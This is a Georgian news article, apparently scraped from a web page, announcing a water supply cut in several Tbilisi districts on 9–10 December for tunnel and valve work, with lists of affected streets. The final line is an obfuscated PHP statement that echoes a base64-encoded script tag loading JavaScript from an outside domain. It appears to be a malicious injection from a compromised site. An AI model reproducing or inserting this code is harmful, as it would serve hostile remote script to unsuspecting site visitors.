celsiusi
ავერსი საქკაბელი
9 დეკემბერს, „ჯორჯიან უოთერ ენდ ფაუერი“ ღრმაღელე-ვაზისუბნის წყალგამტარ გვირაბზე წყალმომარაგების სტაბილურობისთვის აუცილებელ სამუშაოებს ჩაატარებს, – ამის შესახებ კომპანიის მიერ გავრცელებულ განცხადებაშია ნათქვამი.
„ჯორჯიან უოთერ ენდ ფაუერის“ ცნობით, წყალმომარაგების სტაბილურობისთვის სამუშაოები ასევე პარალელურად ოთხ სხვადასხვა მისამართზე შესრულდება: ვაზისუბნის რეზერვუარზე ახლით შეიცვლება ჩამკეტ-მარეგულირებელი ურდულები, სატუმბო სადგურში წყალსადენის ქსელზე ჩატარდება გადაერთებითი სამუშაოები. კომპანიის ტექნიკური ჯგუფები ქვალონისა და უშაკოვის ქუჩებზე გადაუდებელ სამუშაოებს შეასრულებენ და ახალ ურდულებს დაამონტაჟებენ.
„აღნიშნულთან დაკავშირებით აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც 9 დეკემბერს, 14:00  საათიდან 10 დეკემბრის 14:00 საათამდე წყალმომარაგება შეეზღუდება:
ჩუღურეთის რაიონში – რეხის I, II, III, ქუჩებს, სამშვილდის, მარუაშვილის, აფხაზეთის, 9 ძმა ხერხეულიძის, ცაიშის, აბაშის, სალხინოს, ნორიოს, ჩეჩელაშვილის, მნათობის, დავითაშვილის, ბაგრატიონის, სალიების, გუმათის, ბოდავის, ასპინძის, ხუდადოვის, მახათის, ხეხილ-სანერგე მეურნეობის, მეუნარგიას, გედევანიშვილის, მახათის აღმართს,  ჯორჯაძის, ალავერდის, განთიადის, ივერთუბნის დასახლებას, არაგვისპირელის, სიღნაღის, ხორნაულისა და მიმდებარე ქუჩებს.
ისნის რაიონიში – ქეთევან დედოფლის გამზირის ნაწილს, ხერხეულიძის, მთავარანგელოზის, წურწუმიას, ხომერიკის, საბანაკოს I შესახვევს, ისნის, აწყურის, წულუკიძის III, IV შესახვევებს, კაიშაურის, სამრეკლოს, ახვლედიანის, ავლაბრის,  წინანდლის, II შორაპნის, გუჯარეთის, ჯორჯ ბუშის, აწყურის, ბუცხრიკიძის, ნავთლუღის, ბოჭორმის, მარტყოფის, უჯარმის, კაჭარავას, ანჯაფარიძის, დოლაბაურის I-II-III ქუჩებს, ღვინის აღმართს, მეტეხის ქუჩას, დუტუ მეგრელის, 300 არაგველის, ჰოლბრუკის, შორაპნისა და მიმდებარე ქუჩებს. სამრეწველოს დასახლების I და II ქუჩას, გაბრიელ სალოსის გამზირის IV და V შესახვევს, მოსკოვის გამზირის ნაწილს, სამგორისა და მიმდებარე ქუჩებს.
ვაზისუბნის დასახლებას, ვაზისუბნის მიკრორაიონებს, ვაზის ქუჩის II-III გასასვლელებს, პილსუდსკის გამზირს, მუსხელიშვილის, მშველიძის, სულაქველიძის, დავითიანისა და მიმდებარე ქუჩებს. მხატვრების დასახლებას. ვარკეთილი IV მიკრორაიონის მე-3 კვარტალს.
ნაძალადევის რაიონში – გეგუთის, სვირის, კიშინოვის, ზეკარის, ასურეთის, ჟღენტის, ლოტკინის  მთის, სამღერეთის, გორდის, ლაითურის, ბეჟანიშვილის, ღრმაღელის, ილურიძის, ჯავის, დიდი ჯიხაიშის, კოკინაკის, თიანეთის, ტიბაანის, ლიახვის, გუდამაყრის, ღრმაღელეს, რატევანის, სანზონის ქუჩის ნაწილს, ხუდადოვის, ბენდელიანის, კახიანის, კაჭრეთის,  მესხის, ურიდიას,  ჩარგლის ქუჩის ნაწილს, გავაზაურის, ხევსურეთის, სვანეთის, სააკაძის, ჭიჭინაძის, ჯანელიძის ქუჩის ნაწილს, გობრონიძის ქუჩის ნაწილს, ალექსი მესხიშვილის, იმერეთისა და მიმდებარე ქუჩებს.
„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის. წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას „ჯორჯიან უოთერ ენდ ფაუერი“ აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის – 2 93 11 11, „ფეისბუქისა“ და ვებგვერდის მეშვეობით“, – ნათქვამია კომპანიის განცხადებაში.
409
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");